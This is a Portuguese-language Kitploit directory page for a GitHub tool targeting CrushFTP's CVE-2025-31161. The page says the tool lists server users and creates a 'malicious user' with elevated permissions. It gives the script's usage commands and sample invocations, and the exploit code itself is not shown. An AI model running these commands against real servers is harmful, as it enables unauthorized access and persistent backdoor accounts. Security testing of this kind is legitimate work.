Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-31161 | Kitploit
Ferramentas/GitHubGitHub/ch3m1cl/cve-2025-31161
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubch3m1cl/cve-2025-31161

CVE-2025-31161

Ver Repositório
11há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-31161 - Script de Exploit do CrushFTP

Python License


Descrição

Este repositório contém um script Python para interagir com o serviço CrushFTP vulnerável a CVE-2025-31161 O script permite listar usuários existentes e adicionar um usuário malicioso ao explorar a vulnerabilidade.


Funcionalidades

  • Verifica se o host está ativo antes de executar comandos.
  • Lista usuários válidos no servidor CrushFTP.
  • Cria um usuário malicioso com permissões elevadas.
  • Tratamento básico de respostas HTTP e erros.

Requisitos

  • Python 3.10 ou superior
  • módulo requests

Instalar dependências:

root@kitploit:~
pip install -r requirements.txt

Listar usuários

root@kitploit:~
python3 CVE-2025-31161.py listusers --ip <IP> --port <PORT>

Adicionar Usuário Malicioso

root@kitploit:~
python3 CVE-2025-31161.py adduser --ip <IP> --port <PORT> --valid_username <VALID_ADMIN> --username <NEW_USER> --password <PASSWORD>

Exemplos:

Listar usuários em um alvo:

root@kitploit:~
python3 CVE-2025-31161.py listusers --ip 192.168.1.100 --port 80

Adicionar um usuário malicioso:

root@kitploit:~
python3 CVE-2025-31161.py adduser --ip 192.168.1.100 --port 8080 --username eviluser --password 1234
Baixar ferramenta